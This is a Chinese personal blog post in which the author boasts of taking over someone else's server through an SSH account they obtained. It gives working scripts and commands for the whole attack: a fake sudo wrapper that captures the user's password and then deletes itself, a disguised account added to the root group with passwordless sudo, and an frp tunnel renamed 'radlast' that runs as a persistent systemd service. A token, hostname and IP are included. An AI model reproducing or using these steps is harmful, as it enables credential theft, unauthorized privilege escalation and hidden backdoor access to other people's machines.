技术归档文章随笔一句话导航搜索关于

偷用别人服务器的一个记录

日期: 2022-06-27 分组: 随笔 标签: 随笔 3分钟 537字

一个偷用别人服务器的一个记录

前几天获取到了一个SSH的远程连接方式,连接的主人是有sudo权限的,现在我想也要获取到sudo的权限,然后我就写了下面的这个脚本用来获取sudo密码

Terminal window
1
touch ~/.local/bin/sudo
2
chmod +x ~/.local/bin/sudo
3
vim ~/.local/bin/sudo
1
#!/bin/bash
2
3
echo -n "[sudo] password for $USER: "
4
read -s password
5
echo
6
7
echo $password >> ~/.local/pass
8
9
file=~/.local/pass # 文件名
10
line_count=$(wc -l < "$file")
11
if [[ $line_count -gt 2 ]]; then
12
echo ERROR: reconnect terminal!
13
rm -rf ~/.local/bin/sudo
14
fi

~/.local/bin/ 目录会在用户登录的时候添加到 $PATH 环境变量当中,配置可在 .profile 文件查看。

这样用户再执行 sudo 命令的时候就会默认执行 ~/.local/bin/sudo 原本的 /usr/bin/sudo 不再执行,但是这个脚本只会将接下来输入的密码记录下来,真正的 sudo 操作没有进行,在执行两次之后会提示 ERROR: reconnect terminal!,这时候这个人会疑问为什么不管用,然后再试一下,然后再试一下,然后再试一下就提示了,这个时候脚本会对自己进行删除,再执行的话会出错,只能进行重新登陆。

其实这个脚本稍微注意一点就能发现问题,但是我就成功地骗到了sudo的密码

接下来的操作

创建用户

Terminal window
1
# 创建一个home目录在指定位置的用户
2
# 因为我是先添加了一个无家的用户 所以才有下面的操作
3
# 1004为uid 可使用 id <username> 来查看
4
sudo usermod -d /usr/systemp/temp -u 1004 systemp
5
sudo chown -R systemp:systemp temp/
6
7
# 添加新用户到 root 用户组
8
sudo usermod -aG root <username>
9
groups <username>
10
11
# 将root用户组添加到sudo列表 下面的配置会让sudo不需要输入密码
12
13
$ visudo
14
15
%root ALL=(ALL:ALL) NOPASSWD: ALL

启动frp服务

我将 frp 名称改成了 radlast 下面这个是一个启动脚本

Terminal window
1
sudo touch /usr/systemp/services/radlast/start
2
sudo chmod +x /usr/systemp/services/radlast/start
3
sudo vim /usr/systemp/services/radlast/start
1
#!/bin/bash
2
3
cd /usr/systemp/services/radlast
4
5
./radlast -c last.ini

添加一个 systemd 配置文件

Terminal window
1
sudo vim /etc/systemd/system/radlast.service
1
[Unit]
2
Description=Radlast
3
After=network.target
4
5
[Service]
6
User=systemp
7
ExecStart=/usr/systemp/services/radlast/start
8
Restart=always
9
10
[Install]
11
WantedBy=default.target
Terminal window
1
# 重新加载配置文件
2
sudo systemctl daemon-reload
3
4
sudo systemctl start radlast.service
5
sudo systemctl enable radlast.service

只用这些端口 24101-24199

1
[common]
2
bind_port = 62837
3
token = frpservice:1544

nk.cglang.com 101.6.30.228

人应当是有理想的.
文章目录